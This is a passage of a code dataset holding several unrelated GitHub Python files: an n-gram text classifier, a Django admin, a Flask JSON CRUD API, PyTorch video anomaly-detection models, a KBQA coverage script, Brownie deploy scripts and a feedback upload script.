progress.update(1)\n\n # sort desc by insincere count\n sorted_count = sorted(count.items(), key=lambda item: item[1][1], reverse=True)\n total0 = float(sum([count[key][0] for key in count]))\n total1 = float(sum([count[key][1] for key in count]))\n result = []\n for item in sorted_count:\n r = list(item[0])\n r.extend(list(item[1]))\n r.append(item[1][0]/total0 if total0 > 0 else 0.)\n r.append(item[1][1]/total1 if total1 > 0 else 0.)\n result.append(tuple(r))\n return result\n\n\ndef get_target_kwords(df, k=3):\n count_all = get_kwords(df, k=3)\n headers = ['w0','w1','w2','count0','count1','rate0','rate1']\n\n print('\\nGetting target k-words...')\n result = {}\n print_list = []\n for item in tqdm(count_all):\n if item[-2]*10 < item[-1]:\n kword = tuple(item[j] for j in range(k))\n result[kword] = (item[-2], item[-1])\n\n return result\n\n\ndef predict(df_data, target_kwords, k=3, training=False):\n result = []\n predicted_correct = 0\n print('\\nPredicting target values...')\n progress = tqdm(total=df_data.shape[0])\n for index, row in df_data.iterrows():\n line = row[1].lower()\n target = row[2] if training else None\n for c in '.,:;?!/\"\\'()*&^%$#@':\n line = line.replace(c, ' ')\n\n line_words = word_tokenize(line)\n found_kwords = []\n for i in range(len(line_words)-k+1):\n kword = tuple(line_words[i+j] for j in range(k))\n if kword in target_kwords:\n found_kwords.append(kword)\n predicted = 1 if len(found_kwords) > 1 else 0\n \n if training:\n result.append((row[0], row[1], target, found_kwords, predicted))\n predicted_correct += 1 if predicted == target else 0\n else:\n result.append((row[0], predicted))\n progress.update(1)\n\n accuracy = predicted_correct/df_data.shape[0] if training else None\n return result, accuracy\n \n\ndir_path = os.path.abspath(\"../input\")\ndf_data = pd.read_csv(os.path.join(dir_path, 'train.csv'))\ntarget_kwords = get_target_kwords(df_data, k=3)\n\ndf_test = pd.read_csv(os.path.join(dir_path, 'test.csv'))\npredict_data, accuracy = predict(df_test, target_kwords, k=3, training=False)\nwrite_file('submission.csv', ['qid','prediction'], 
predict_data)\n\n\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/quora-insincere-questions-classification/GL/quora-3-gram-benchmark.py","file_name":"quora-3-gram-benchmark.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"32156976996","text":"from django.contrib import admin\n\nfrom keep_fm.tracks.models import Track, Artist\n\n\n@admin.register(Artist)\nclass ArtistAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"name\",\n )\n search_fields = (\"name\",)\n\n\n@admin.register(Track)\nclass TrackAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"name\",\n \"artist\",\n \"spotify_uri\",\n )\n readonly_fields = (\n \"spotify_data\",\n \"spotify_audio_features\",\n \"slug\",\n )\n list_select_related = (\"artist\",)\n autocomplete_fields = (\"artist\",)\n search_fields = (\n \"name\",\n \"artist__name\",\n )\n","repo_name":"rafaljusiak/keep-fm","sub_path":"keep_fm/tracks/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11441558561","text":"from dataclasses import dataclass\nfrom ntpath import join\nfrom posixpath import dirname\nimport uuid\nimport dotenv\nfrom os import path\nimport json\nfrom flask import Flask, request, jsonify\nfrom dotenv import load_dotenv\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n\napi = Flask(__name__)\n\n\n@api.route('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Welcome to the API', 'status': '200'})\n\n#READ ALL USERS - [GET] /users\n@api.route('/users', methods=['GET'])\ndef getUsers():\n\n if path.isfile('users.json'):\n with open('users.json') as f:\n users = json.load(f)\n if users:\n return jsonify({'users': users, 'status': '200'})\n else:\n return jsonify({'message': 'No users found', 'status': '404'})\n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\n\n#READ USER - [GET] /user/\n@api.route('/user/', methods=['GET'])\ndef getUser(id):\n if path.isfile('users.json'):\n with open('users.json') as f:\n users = json.load(f)\n if users:\n for user in users:\n if user['id'] == id:\n return jsonify({'user': user, 'status': '200'})\n else:\n return jsonify({'message': 'User not found', 'status': '404'}) \n else:\n return jsonify({'message': 'No users found', 'status': '404'})\n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\n\n# CREATE USER - [PUT] /user - {\"name\":\"dincer\",\"surname\":\"degre\",\"email\":\"dincerdegre@gmail.com\"}\n@api.route('/user', methods=['PUT'])\ndef createUser():\n if path.isfile('users.json'):\n userData = request.get_json()\n i = uuid.uuid4().hex\n with open('users.json') as f:\n usersData = json.load(f)\n if not usersData:\n userData['id'] = i\n data = [userData]\n with open('users.json', 'w') as f:\n json.dump(data, f)\n return jsonify({'message': 'User created', 'status': '200'})\n else: \n for user in usersData:\n if userData['email'] == user['email']:\n return jsonify({'message': 'User already exists', 'status': '400'})\n userData['id'] = i\n data = usersData + [userData]\n with open('users.json', 'w') as f:\n json.dump(data, f)\n return jsonify({'message': 'User created', 'status': '200'}) \n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\n \n# CREATE OR UPDATE USER - [POST] /user - 
{\"name\":\"dincer\",\"surname\":\"degre\",\"email\":\"dincerdegre@gmail.com\"}\n@api.route('/user', methods=['POST'])\ndef createOrUpdateUser():\n if path.isfile('users.json'):\n userInputData = request.get_json()\n i = uuid.uuid4().hex\n data = []\n with open('users.json') as f:\n usersFileData = json.load(f)\n if not usersFileData:\n userInputData['id'] = i\n data.append(userInputData)\n with open('users.json', 'w') as f:\n json.dump(data, f)\n return jsonify({'message': 'User created', 'status': '200'})\n else: \n \n index = 0\n fIndex = None\n for userData in usersFileData:\n if userData['email'] == userInputData['email']:\n fIndex = index \n index = index + 1 \n \n if fIndex != None:\n userInputData['id'] = usersFileData[fIndex]['id']\n usersFileData[fIndex] = userInputData\n data = usersFileData\n userMessage = \"User updated\"\n else:\n data = usersFileData\n userInputData['id'] = i\n data.append(userInputData)\n userMessage = \"User created\"\n \n with open('users.json', 'w') as f:\n json.dump(data, f) \n return jsonify({'message': userMessage, 'status': '200','data':data}) \n else:\n return jsonify({'message': 'User File not found', 'status': '404'}) \n \n\n\n \n# DELETE - [DELETE] /user/ \n@api.route('/user/', methods=['DELETE']) \ndef deleteUser(id): \n if path.isfile('users.json'):\n data = []\n deletedUser = {}\n with open('users.json') as f:\n usersFileData = json.load(f)\n if usersFileData:\n for user in usersFileData:\n if user['id'] == id:\n deletedUser = user\n continue\n else:\n data.append(user)\n if (deletedUser): \n with open('users.json', 'w') as f:\n json.dump(data, f) \n return jsonify({'message': 'User deleted', 'status': '200','data':deletedUser}) \n else:\n return jsonify({'message': 'No users found', 'status': '404'}) \n else:\n return jsonify({'message': 'No users found', 'status': '404'})\n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\napi.run(debug=True)\n\n\n","repo_name":"dincerdegre/python-rest-api-crud-example","sub_path":"flaskapi.py","file_name":"flaskapi.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39671058845","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as torch_init\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\nfrom model.modules import Fusion, MotionMemory, SA\n\n\ndef weight_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1 or classname.find('Linear') != -1:\n torch_init.xavier_uniform_(m.weight)\n if m.bias is not None:\n m.bias.data.fill_(0)\n\n\n# https://github.com/AlexHex7/Non-local_pytorch/blob/master/Non-Local_pytorch_0.4.1_to_1.1.0/lib/non_local_gaussian.py\nclass _NonLocalBlockND(nn.Module):\n def __init__(self, in_channels, inter_channels=None, dimension=3, sub_sample=True, bn_layer=True):\n super(_NonLocalBlockND, self).__init__()\n\n assert dimension in [1, 2, 3]\n\n self.dimension = dimension\n self.sub_sample = sub_sample\n\n self.in_channels = in_channels\n self.inter_channels = inter_channels\n\n if self.inter_channels is None:\n self.inter_channels = in_channels // 2\n if self.inter_channels == 0:\n self.inter_channels = 1\n\n if dimension == 3:\n conv_nd = nn.Conv3d\n max_pool_layer = nn.MaxPool3d(kernel_size=(1, 2, 2))\n bn = nn.BatchNorm3d\n elif dimension == 2:\n conv_nd = nn.Conv2d\n max_pool_layer = nn.MaxPool2d(kernel_size=(2, 2))\n bn = nn.BatchNorm2d\n else:\n conv_nd = nn.Conv1d\n max_pool_layer = 
nn.MaxPool1d(kernel_size=(2))\n bn = nn.BatchNorm1d\n\n self.g = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if bn_layer:\n self.W = nn.Sequential(\n conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0),\n bn(self.in_channels)\n )\n nn.init.constant_(self.W[1].weight, 0)\n nn.init.constant_(self.W[1].bias, 0)\n else:\n self.W = conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0)\n nn.init.constant_(self.W.weight, 0)\n nn.init.constant_(self.W.bias, 0)\n\n self.theta = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n self.phi = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if sub_sample:\n self.g = nn.Sequential(self.g, max_pool_layer)\n self.phi = nn.Sequential(self.phi, max_pool_layer)\n\n def forward(self, x, return_nl_map=False):\n \"\"\"\n :param x: (b, c, t, h, w)\n :param return_nl_map: if True return z, nl_map, else only return z.\n :return:\n \"\"\"\n\n batch_size = x.size(0)\n\n g_x = self.g(x).view(batch_size, self.inter_channels, -1)\n g_x = g_x.permute(0, 2, 1)\n\n theta_x = self.theta(x).view(batch_size, self.inter_channels, -1)\n theta_x = theta_x.permute(0, 2, 1)\n phi_x = self.phi(x).view(batch_size, self.inter_channels, -1)\n\n f = torch.matmul(theta_x, phi_x)\n N = f.size(-1)\n f_div_C = f / N\n\n y = torch.matmul(f_div_C, g_x)\n y = y.permute(0, 2, 1).contiguous()\n y = y.view(batch_size, self.inter_channels, *x.size()[2:])\n W_y = self.W(y)\n z = W_y + x\n\n if return_nl_map:\n return z, f_div_C\n return z\n\n\nclass NONLocalBlock1D(_NonLocalBlockND):\n def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):\n super(NONLocalBlock1D, self).__init__(in_channels,\n inter_channels=inter_channels,\n dimension=1, sub_sample=sub_sample,\n bn_layer=bn_layer)\n\n\n\nclass Aggregate(nn.Module):\n def __init__(self, len_feature):\n super(Aggregate, self).__init__()\n bn = nn.BatchNorm1d\n self.len_feature = len_feature\n self.conv_1 = nn.Sequential(\n nn.Conv1d(in_channels=len_feature, out_channels=512, kernel_size=3,\n stride=1,dilation=1, padding=1),\n nn.ReLU(),\n bn(512)\n # nn.dropout(0.7)\n )\n self.conv_2 = nn.Sequential(\n nn.Conv1d(in_channels=len_feature, out_channels=512, kernel_size=3,\n stride=1, dilation=2, padding=2),\n nn.ReLU(),\n bn(512)\n # nn.dropout(0.7)\n )\n self.conv_3 = nn.Sequential(\n nn.Conv1d(in_channels=len_feature, out_channels=512, kernel_size=3,\n stride=1, dilation=4, padding=4),\n nn.ReLU(),\n bn(512)\n # nn.dropout(0.7),\n )\n self.conv_4 = nn.Sequential(\n nn.Conv1d(in_channels=2048, out_channels=512, kernel_size=1,\n stride=1, padding=0, bias = False),\n nn.ReLU(),\n # nn.dropout(0.7),\n )\n self.conv_5 = nn.Sequential(\n nn.Conv1d(in_channels=2048, out_channels=2048, kernel_size=3,\n stride=1, padding=1, bias=False), # should we keep the bias?\n nn.ReLU(),\n nn.BatchNorm1d(2048),\n # nn.dropout(0.7)\n )\n\n self.non_local = NONLocalBlock1D(512, sub_sample=False, bn_layer=True)\n\n\n def forward(self, x):\n # x: (B, T, F)\n out = x.permute(0, 2, 1) # 做了个转置是为了在时间维度上应用attention\n residual = out\n\n out1 = self.conv_1(out)\n out2 = self.conv_2(out)\n\n out3 = self.conv_3(out)\n out_d = torch.cat((out1, out2, out3), dim = 1)\n out = self.conv_4(out)\n out = self.non_local(out)\n out = torch.cat((out_d, 
out), dim=1)\n out = self.conv_5(out) # fuse all the features together\n out = out + residual\n out = out.permute(0, 2, 1)\n # out: (B, T, F)\n\n return out\n\nclass Classifier(nn.Module):\n def __init__(self,feature_dim,dropout_rate=0.7):\n super(Classifier, self).__init__()\n self.classifier=nn.Sequential(nn.Linear(feature_dim,512), nn.ReLU(), nn.Dropout(dropout_rate),\n nn.Linear(512,128), nn.ReLU(), nn.Dropout(dropout_rate),\n nn.Linear(128,1), nn.Sigmoid())\n\n\n def forward(self, x):\n # (bs * ncrops, T, F)\n scores = self.classifier(x)\n return scores\n\nclass HardModel(nn.Module):\n def __init__(self, feature_dim):\n super(HardModel, self).__init__()\n\n self.thres = 0.2\n\n self.Aggregate = Aggregate(len_feature=feature_dim)\n self.drop_out = nn.Dropout(0.7)\n self.p_classifier_rgb = Classifier(feature_dim=feature_dim)\n self.p_classifier_flow = Classifier(feature_dim=feature_dim)\n\n self.f_classifier = Classifier(feature_dim=feature_dim)\n self.fusion = Fusion()\n\n self.apply(weight_init)\n\n\n def forward(self, ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow, mode='normal', tencrop=True):\n\n inputs_rgb = torch.cat((ref_rgb, normal_rgb, abnormal_rgb), 0)\n inputs_flow = torch.cat((ref_flow, normal_flow, abnormal_flow), 0)\n bs, ncrops, T, F = inputs_rgb.size()\n inputs_rgb = inputs_rgb.view(-1, T, F)\n inputs_flow = inputs_flow.view(-1, T, F)\n\n p_scores_rgb = self.p_classifier_rgb(inputs_rgb).squeeze(2) # (bs*ncrops, T)\n p_scores_flow = self.p_classifier_flow(inputs_flow).squeeze(2) # (bs*ncrops, T)\n\n features = inputs_rgb\n features = self.Aggregate(features) #attention放在这里精度有明显提升(能达到96.6,2个百分点),但放到后面会起很大的负作用\n features = self.drop_out(features) # (bs*ncrops, T, F)\n\n bs = bs // 3\n if tencrop:\n ref_p_scores_rgb, abn_scores_rgb = p_scores_rgb[:bs*ncrops], p_scores_rgb[2*bs*ncrops:3*bs*ncrops]\n ref_p_scores_flow, abn_scores_flow = p_scores_flow[:bs*ncrops], p_scores_flow[2*bs*ncrops:3*bs*ncrops]\n\n ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow = \\\n features[:bs*ncrops], ref_flow.view(bs*ncrops, T, -1), features[bs*ncrops:2*bs*ncrops], \\\n normal_flow.view(bs*ncrops, T, -1), features[2*bs*ncrops:3*bs*ncrops], abnormal_flow.view(bs*ncrops, T, -1)\n\n if bs == 1: # this is for inference\n # ref_rgb = self.Aggregate(ref_rgb)\n # ref_rgb = self.drop_out(ref_rgb)\n ref_scores = self.f_classifier(ref_rgb)\n ref_scores = ref_scores.view(bs, ncrops, -1).mean(1) # 对这个帧的10个crops取平均得到这帧的分数[bs, T]\n return ref_scores\n\n if mode == 'normal':\n # 当ref为normal时\n hard_topK = 10 #挑选出abnormal video中的x个困难样本,即异常分数值接近于0.5\n hard_topK_idx = torch.topk(torch.abs_(abn_scores_rgb-0.5), hard_topK, dim=1, largest=False)[1]\n hard_topK_flow_scores = torch.gather(abn_scores_flow, 1, hard_topK_idx)\n hard_topK_feat = torch.gather(abnormal_rgb, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat = torch.gather(abnormal_flow, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_abn = 1 # 从x个困难样本中挑选出x个flow score为异常的样本\n hard_topK_idx_abn = torch.topk(hard_topK_flow_scores, hard_topK_abn, dim=1)[1]\n hard_topK_feat_abn = torch.gather(hard_topK_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_abn = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_nor = 1 # 从x个困难样本中挑选出x个flow score为正常的样本\n hard_topK_idx_nor = torch.topk(hard_topK_flow_scores, hard_topK_nor, dim=1, largest=False)[1]\n hard_topK_feat_nor = torch.gather(hard_topK_feat, 
1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_nor = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n\n\n nor_topK = 2 #将abnormal video中置信度高的x个clip视为normal\n abn_k_idx_nor = torch.topk(abn_scores_rgb, nor_topK, dim=1, largest=False)[1]\n abn_k_idx_nor = abn_k_idx_nor.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_nor = torch.gather(abnormal_rgb, 1, abn_k_idx_nor)\n abn_flow_feat_nor = torch.gather(abnormal_flow, 1, abn_k_idx_nor)\n\n abn_topK = 8 #挑选出abnormal video中置信度高的x个clip作为abnormal\n abn_k_idx_abn = torch.topk(abn_scores_rgb, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n nor_rgb_feat = torch.cat([normal_rgb, hard_topK_feat_nor, abn_rgb_feat_nor], dim=1) # 在视频内部维度上进行拼接\n nor_flow_feat = torch.cat([normal_flow, hard_topK_flow_feat_nor, abn_flow_feat_nor], dim=1)\n\n fusion_feat = self.fusion(ref_rgb, ref_flow, nor_rgb_feat, nor_flow_feat)\n ref_attn_feat = fusion_feat\n sup_attn_feat = torch.cat([abn_rgb_feat_abn, hard_topK_feat_abn], dim=1) # todo: rank loss\n\n else:\n # 当ref为abnormal时\n hard_topK = 10 # 挑选出abnormal ref video中的x个困难样本,即异常分数值接近于0.5\n hard_topK_idx = torch.topk(torch.abs_(ref_p_scores_rgb - 0.5), hard_topK, dim=1, largest=False)[1]\n hard_topK_flow_scores = torch.gather(ref_p_scores_flow, 1, hard_topK_idx)\n hard_topK_feat = torch.gather(ref_rgb, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat = torch.gather(ref_flow, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_abn = 1 # 从x个困难样本中挑选出x个flow score为异常的样本\n hard_topK_idx_abn = torch.topk(hard_topK_flow_scores, hard_topK_abn, dim=1)[1]\n hard_topK_feat_abn = torch.gather(hard_topK_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_abn = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_nor = 1 # 从x个困难样本中挑选出x个flow score为正常的样本\n hard_topK_idx_nor = torch.topk(hard_topK_flow_scores, hard_topK_nor, dim=1, largest=False)[1]\n hard_topK_feat_nor = torch.gather(hard_topK_feat, 1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_nor = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n\n ##########################\n ref_topK = 10 # 从abnormal ref video中挑选出x个置信度高的异常样本\n ref_k_idx_abn = torch.topk(ref_p_scores_rgb, ref_topK, dim=1, largest=True)[1]\n ref_k_idx_abn = ref_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n ref_rgb_feat_abn = torch.gather(ref_rgb, 1, ref_k_idx_abn)\n ref_flow_feat_abn = torch.gather(ref_flow, 1, ref_k_idx_abn)\n\n abn_topK = 10 # 从abnormal sup video中挑选出x个置信度高的异常样本\n abn_k_idx_abn = torch.topk(abn_scores_rgb, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n ref_feat_abn = torch.cat([ref_rgb_feat_abn, hard_topK_feat_abn], dim=1)\n ref_flow_abn = torch.cat([ref_flow_feat_abn, hard_topK_flow_feat_abn], dim=1)\n\n fusion_feat_nor = self.fusion(ref_feat_abn, ref_flow_abn, abn_rgb_feat_abn, abn_flow_feat_abn)\n ref_attn_feat = fusion_feat_nor\n sup_attn_feat = torch.cat([normal_rgb, hard_topK_feat_nor], dim=1) # todo: rank loss\n\n # ref_attn_feat = self.Aggregate(ref_attn_feat) 
#放在这里会起负作用\n # ref_attn_feat = self.drop_out(ref_attn_feat)\n\n ref_scores = self.f_classifier(ref_attn_feat)\n\n if tencrop:\n ref_p_scores_rgb = ref_p_scores_rgb.view(bs, ncrops, -1).mean(1)\n ref_scores = ref_scores.view(-1, ncrops).mean(1)\n\n return ref_p_scores_rgb, ref_scores\n\nclass CoModel(nn.Module):\n def __init__(self, n_features, batch_size):\n super(CoModel, self).__init__()\n self.batch_size = batch_size\n self.num_segments = 32\n self.k_abn = self.num_segments // 10\n self.k_nor = self.num_segments // 10\n\n self.Aggregate = Aggregate(len_feature=2048)\n self.drop_out = nn.Dropout(0.7)\n self.p_classifier = Classifier(feature_dim=2048)\n self.f_classifier = Classifier(feature_dim=2048)\n\n self.fusion = Fusion()\n\n self.apply(weight_init)\n\n\n def forward(self, ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow, mode='normal', tencrop=True):\n\n inputs_rgb = torch.cat((ref_rgb, normal_rgb, abnormal_rgb), 0)\n bs, ncrops, T, F = inputs_rgb.size()\n inputs_rgb = inputs_rgb.view(-1, T, F)\n\n p_scores = self.p_classifier(inputs_rgb).squeeze(2) # (bs*ncrops, T)\n features = self.Aggregate(inputs_rgb)\n features = self.drop_out(features) # (bs*ncrops, T, F)\n\n bs = bs // 3\n if tencrop:\n ref_p_scores, abn_scores = p_scores[:bs*ncrops], p_scores[2*bs*ncrops:3*bs*ncrops]\n ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow = \\\n features[:bs*ncrops], ref_flow.view(bs*ncrops, T, -1), features[bs*ncrops:2*bs*ncrops], \\\n normal_flow.view(bs*ncrops, T, -1), features[2*bs*ncrops:3*bs*ncrops], abnormal_flow.view(bs*ncrops, T, -1)\n\n if bs == 1: # this is for inference\n ref_scores = self.f_classifier(ref_rgb)\n ref_scores = ref_scores.view(bs, ncrops, -1).mean(1) # 对这个帧的10个crops取平均得到这帧的分数[bs, T]\n return ref_scores\n\n if mode == 'normal':\n # 当ref为normal时\n nor_topK = 2 #将abnormal video中的x个clip视为normal\n abn_k_idx_nor = torch.topk(abn_scores, nor_topK, dim=1, largest=False)[1]\n abn_k_idx_nor = abn_k_idx_nor.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_nor = torch.gather(abnormal_rgb, 1, abn_k_idx_nor)\n abn_flow_feat_nor = torch.gather(abnormal_flow, 1, abn_k_idx_nor)\n\n abn_topK = 8 #挑选出abnormal video中x个clip作为abnormal\n abn_k_idx_abn = torch.topk(abn_scores, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n nor_rgb_feat = torch.cat([normal_rgb, abn_rgb_feat_nor], dim=1) # 在视频内部维度上进行拼接\n nor_flow_feat = torch.cat([normal_flow, abn_flow_feat_nor], dim=1)\n\n fusion_feat = self.fusion(ref_rgb, ref_flow, nor_rgb_feat, nor_flow_feat)\n ref_attn_feat = fusion_feat\n sup_attn_feat = abn_rgb_feat_abn # for rank loss\n\n else:\n # 当ref为abnormal时\n ref_topK = 10\n ref_k_idx_abn = torch.topk(ref_p_scores, ref_topK, dim=1, largest=True)[1]\n ref_k_idx_abn = ref_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n ref_rgb_feat_abn = torch.gather(ref_rgb, 1, ref_k_idx_abn)\n ref_flow_feat_abn = torch.gather(ref_flow, 1, ref_k_idx_abn)\n\n abn_topK = 10\n abn_k_idx_abn = torch.topk(abn_scores, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n fusion_feat_nor = self.fusion(ref_rgb_feat_abn, ref_flow_feat_abn, abn_rgb_feat_abn, abn_flow_feat_abn)\n ref_attn_feat = fusion_feat_nor\n 
sup_attn_feat = normal_rgb # for rank loss\n\n ref_scores = self.f_classifier(ref_attn_feat)\n\n if tencrop:\n ref_p_scores = ref_p_scores.view(bs, ncrops, -1).mean(1)\n ref_scores = ref_scores.view(-1, ncrops).mean(1)\n\n return ref_p_scores, ref_scores\n\n","repo_name":"DogsHeadZ/WVAD","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":19141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73156563361","text":"import re\nimport json\nfrom sparqlretriever import SparqlRetriever\n\nsparql_dir = 'KB-cache/'\nsparql_retriever = SparqlRetriever()\nsparql_retriever.load_cache('%s/M2N.json' % sparql_dir,\n '%s/STATEMENTS.json' % sparql_dir,\n '%s/QUERY.json' % sparql_dir,\n '%s/TYPE.json' % sparql_dir,\n '%s/OUTDEGREE.json' % sparql_dir)\n\ntrain_path = 'Datasets/ConvQuestions/train_set/train_simple.json'\ndev_path = 'Datasets/ConvQuestions/dev_set/dev_simple.json'\ntest_path = 'Datasets/ConvQuestions/test_set/test_simple.json'\nentity_path = 'Datasets/ConvQuestions/entities.txt'\n\nmax_subgraph, total_subgraph, bg1000, total, hit = 0, 0, 0, 0, 0\n\ndef is_date(date):\n\tpattern = re.compile('^[0-9]+ [A-z]+ [0-9][0-9][0-9][0-9]$')\n\tif not(pattern.match(date.strip())):\n\t\treturn False\n\telse:\n\t\treturn True\ndef is_year(year):\n\tpattern = re.compile('^[0-9][0-9][0-9][0-9]$')\n\tif not(pattern.match(year.strip())):\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef load_dict(filename):\n word2id = dict()\n with open(filename, encoding='utf-8') as f_in:\n for line in f_in:\n word = line.strip()\n word2id[word] = len(word2id)\n return word2id\nentity2id = load_dict(entity_path)\nid2entity = {idx: entity for entity, idx in entity2id.items()}\n\n\ndef te_text_in_q(te_texts, q):\n for te in te_texts:\n if te.lower() in q.lower():\n return True\n \n return False\n\nfor path in [train_path, dev_path, test_path]:\n with open(path,\"r\") as f:\n for idx, line in enumerate(f):\n if (idx)%5 != 0:continue\n d = json.loads(line)\n sl = len(d[\"subgraph\"][\"tuples\"])\n total_subgraph += sl\n if sl>max_subgraph:\n max_subgraph = sl\n if sl > 6000:\n bg1000 += 1\n entities = d[\"subgraph\"][\"entities\"]\n \n flag = 0\n te_texts = [sparql_retriever.wikidata_id_to_label(id2entity[t]) for t in d['entities']]\n\n q = d['question']\n for a in d['answers']:\n if entity2id[a['kb_id']] in entities and te_text_in_q(te_texts, q):\n #if entity2id[a['kb_id']] in entities :\n hit += 1\n flag = 1\n break \n total += 1\n\nprint(max_subgraph)\nprint(total_subgraph/total)\nprint(bg1000)\nprint(total)\nprint(hit)\nprint(hit/total)\n \n","repo_name":"Cherlykl/ConvKBQA","sub_path":"Rewriter/analyze_answer_coverage.py","file_name":"analyze_answer_coverage.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32623899129","text":"from brownie import PoolToken, LpToken, GovernanceToken, LiquidityPool\nfrom scripts.helpful_scripts import get_account\n \n\ndef deploy(contract_name, pool_token_address=None, lp_token_address=None, gov_token_address=None):\n account = get_account()\n \n if contract_name == \"PoolToken\":\n PoolToken.deploy({'from': account})\n \n elif contract_name == \"LpToken\":\n LpToken.deploy({'from': account})\n \n elif contract_name == \"GovernanceToken\":\n GovernanceToken.deploy({'from': account})\n \n elif contract_name == \"LiquidityPool\":\n LiquidityPool.deploy(\n pool_token_address,\n 
lp_token_address,\n gov_token_address,\n {'from': account})\n \n ","repo_name":"nicobarra/basic_defi_protocol","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25402774297","text":"#! /usr/bin/env python3\nimport os, requests\n\n# Process directory of text files\nfor file in os.listdir(\"/data/feedback\"):\n with open(\"/data/feedback/\"+file) as file:\n lines = file.readlines()\n feedback_entry = {}\n\n# Create dictionary with data from each file\n feedback_entry[\"title\"] = lines[0].strip()\n feedback_entry[\"name\"] = lines[1].strip()\n feedback_entry[\"date\"] = lines[2].strip()\n feedback_entry[\"feedback\"] = \" \".join(lines[3:]).strip()\n print(feedback_entry)\n\n# Post content to web service api using requests and print the status code.\n response = requests.post(r\"http://example.com/path/to/api\", json=feedback_entry)\n 